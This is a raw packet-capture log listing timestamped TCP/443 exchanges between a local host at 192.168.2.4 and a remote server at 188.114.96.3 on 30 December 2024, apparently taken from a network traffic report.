                                                                  Dec 30, 2024 22:42:41.070326090 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.070401907 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070420980 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070463896 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.070470095 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070502043 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.070522070 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.070808887 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070831060 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070880890 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.070884943 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.070919037 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.070940971 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.071156979 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.071185112 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.071218967 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.071223974 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.071253061 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.071275949 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.157927036 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.157948017 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158063889 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158072948 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158121109 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158305883 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158327103 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158363104 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158366919 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158396006 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158415079 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158621073 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158643007 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158680916 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158684969 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158711910 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158734083 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158853054 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158873081 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158912897 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158917904 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.158946991 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.158966064 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.159194946 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.159215927 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.159262896 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.159266949 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.159296989 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.159316063 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.159432888 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.159455061 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.159491062 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.159498930 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.159527063 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.159544945 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.159708023 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.159733057 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.159761906 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.159765959 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.159794092 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.159815073 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.160012960 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.160032988 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.160070896 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.160075903 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.160103083 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.160121918 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.255556107 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.255604029 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.255688906 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.255705118 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.255748034 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256023884 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256043911 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256081104 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256088972 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256113052 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256133080 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256321907 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256346941 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256388903 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256396055 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256413937 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256443024 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256581068 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256599903 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256639957 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256648064 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256665945 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256681919 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256923914 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256942034 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.256982088 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.256988049 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257014036 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.257031918 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.257247925 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257289886 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257299900 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.257304907 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257344961 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.257549047 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257569075 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257605076 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.257608891 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257622957 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.257657051 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.257685900 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257704973 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257750034 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.257755041 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.257793903 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.354578018 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.354598999 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.354693890 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.354710102 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.354748011 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.354757071 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.354762077 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.354789019 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.354811907 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.354815960 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.354847908 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.354878902 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355005026 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355025053 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355062962 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355067015 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355098009 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355110884 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355190992 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355212927 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355254889 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355259895 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355304956 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355530977 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355551004 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355600119 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355603933 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355627060 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355637074 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355643988 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355665922 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355701923 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355705976 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355732918 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355752945 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355889082 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355907917 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.355973005 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.355978012 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.356018066 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.356041908 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.356061935 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.356092930 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.356103897 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.356118917 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.356148005 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.375395060 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.379235029 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.379595995 CET58522443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.379642010 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.379928112 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.385914087 CET58522443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.385979891 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.386729002 CET58522443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.386729002 CET58522443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.386749029 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.436604977 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.436639071 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.436708927 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.436713934 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.436754942 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.436803102 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.436830044 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.436862946 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.436866999 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.436891079 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.436907053 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.437192917 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.437218904 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.437248945 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.437253952 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.437279940 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.437299013 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.437427044 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.437530994 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.437532902 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.437551975 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.437592983 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.437923908 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.437947989 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.438000917 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.438005924 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.438028097 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.438173056 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.438194036 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.438250065 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.438255072 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.438285112 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.438462019 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.438483953 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.438513041 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.438518047 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.438543081 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.442243099 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.443226099 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.443248987 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.443295002 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.443300009 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.443322897 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.449729919 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.454807997 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.476691961 CET58523443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.476702929 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.476794958 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.476810932 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.477014065 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.477643967 CET58523443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.477684021 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.477698088 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.477735996 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.477823973 CET58523443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.477834940 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.478116989 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.478167057 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.478240013 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.478246927 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.504715919 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.525465965 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525489092 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525563955 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.525572062 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525630951 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525630951 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.525645018 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525681973 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.525687933 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525715113 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.525719881 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525747061 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.525773048 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.525881052 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525901079 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525949001 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.525954008 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.525995016 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.526525021 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.526546001 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.526592970 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.526597977 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.526634932 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.526777029 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.526796103 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.526830912 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.526835918 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.526864052 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.526874065 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.527157068 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.527178049 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.527210951 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.527215958 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.527240992 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.527261019 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.527337074 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.527355909 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.527400017 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.527405977 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.527431011 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.527442932 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.528335094 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.532021046 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.532038927 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.532088995 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.532094002 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.532134056 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.532151937 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.561676979 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.614236116 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.614280939 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.614434004 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.614449024 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.614490032 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.614521027 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.614559889 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.614599943 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.614604950 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.614634037 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.614649057 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.614880085 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.614923000 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.614962101 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.614965916 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.614996910 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.615012884 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.615309000 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.615355015 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.615461111 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.615466118 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.615544081 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.615629911 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.615669966 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.615747929 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.615752935 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.615830898 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.615956068 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.615999937 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.616108894 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.616113901 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.616187096 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.616202116 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.616205931 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.616262913 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.616286993 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.616292000 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.616321087 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.616333008 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.620985031 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.621026039 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.621076107 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.621082067 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.621134996 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.703094006 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.703142881 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.703241110 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.703247070 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.703318119 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.703536034 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.703577042 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.703602076 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.703607082 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:41.703636885 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.703656912 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:41.703793049 CET44358509188.114.96.3192.168.2.4
